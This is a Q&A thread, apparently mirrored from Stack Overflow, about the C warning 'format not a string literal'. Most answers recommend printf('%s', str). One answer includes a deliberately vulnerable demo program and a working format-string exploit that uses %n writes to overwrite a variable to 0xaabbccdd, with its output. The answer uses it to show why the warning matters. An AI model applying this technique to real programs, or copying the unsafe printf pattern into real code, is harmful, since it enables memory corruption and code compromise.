发表新帖
发表新帖

c array - warning: format not a string literal

后端 未结
关注
6 1615
终归单人心
终归单人心 2020-12-25 09:45

I\'m attempting to learn C and already I\'ve run into an issue. I assume its trivial but I need to know it. I have written:

#include 
#include
相关标签:
6条回答
  • 野的像风
    2020-12-25 10:22

    Just to add something to other answers, you better do this because a (long?) time ago people wrote printf like that and hackers found a way to read from and write to the stack, more here.
    For example, a simple program like this:

    blackbear@blackbear-laptop:~$ cat format_vul.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char text[1024];
    static int test_var = -1;

    if(argc < 2) {
        printf("Use: %s <input>\n", argv[0]);
        exit(-1);
    }

    strcpy(text, argv[1]);

    printf("The correct way:\n");
    printf("%s", text);

    printf("\nThe wrong way:\n");
    printf(text);

    printf("\n[*]: test_var @ %8p = %d ( 0x%x )\n", &test_var, test_var, test_var);
}
blackbear@blackbear-laptop:~$ ./format_vul AAAA
The correct way:
AAAA
The wrong way:
AAAA
[*]: test_var @ 0x804a024 = -1 ( 0xffffffff )

    Can be used to change test_var's value from 0xffffff to something else, like 0xaabbccdd:

    blackbear@blackbear-laptop:~$ ./format_vul $(printf "\x24\xa0\x04\x08JUNK\x2
5\xa0\x04\x08JUNK\x26\xa0\x04\x08JUNK\x27\xa0\x04\x08").%8x.%8x.%8x.%8x.%8x.
%8x.%8x.%8x.%8x.%110x.%n%239x%n%239x%n%239x%n
The correct way:
$�JUNK%�JUNK&�JUNK'�.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%110x.%n%239x%n%239
x%n%239x%n
The wrong way:
$�JUNK%�JUNK&�JUNK'�.bfffefec.  154d7c.  155d7c.  155d7c.      f0.      f0.b
ffff4a4.       4.       4.                                                  
                                                     174.                   


                                                50415243                    


                                               50415243                     


                                              50415243
[*]: test_var @ 0x804a024 = -1430532899 ( 0xaabbccdd )
    0 讨论(0)
  • 忘了有多久
    2020-12-25 10:22

    printf() expects it's format to be a string literal, not a dynamically created string. To fix, try this:

    printf("%s", str_a); // %s denotes a string

    Or use puts

    puts(str_a);
    0 讨论(0)
  • 小蘑菇
    2020-12-25 10:27

    The error is coming from printf(str_a);. Your code should be printf("%s",str_a); take a look at the following link for more info on printf. http://www.cprogramming.com/tutorial/printf-format-strings.html

    0 讨论(0)
  • 粉色の甜心
    2020-12-25 10:32

    The warning is caused by the compiler wanting the first argument of printf to be a string literal. It wants you to write this:

    printf("%s\n", str_a);

    This is because the first parameter of printf is the format string. The format arguments are then passed after that.

    Note: You can in fact use a variable as a format string, but you probably shouldn't do that. That's why the compiler issues a warning and not an error.

    0 讨论(0)
  • 隐瞒了意图╮
    2020-12-25 10:33

    When using printf, the format string is better be a string literal and not a variable:

    printf("%s", str_a);
    0 讨论(0)
  • 醉话见心
    2020-12-25 10:48

    Please read the warning 'no format arguments' - i.e. no % in the string.

    Try printf("%s", str_a);

    0 讨论(0)
 看不清?
提交回复
热议问题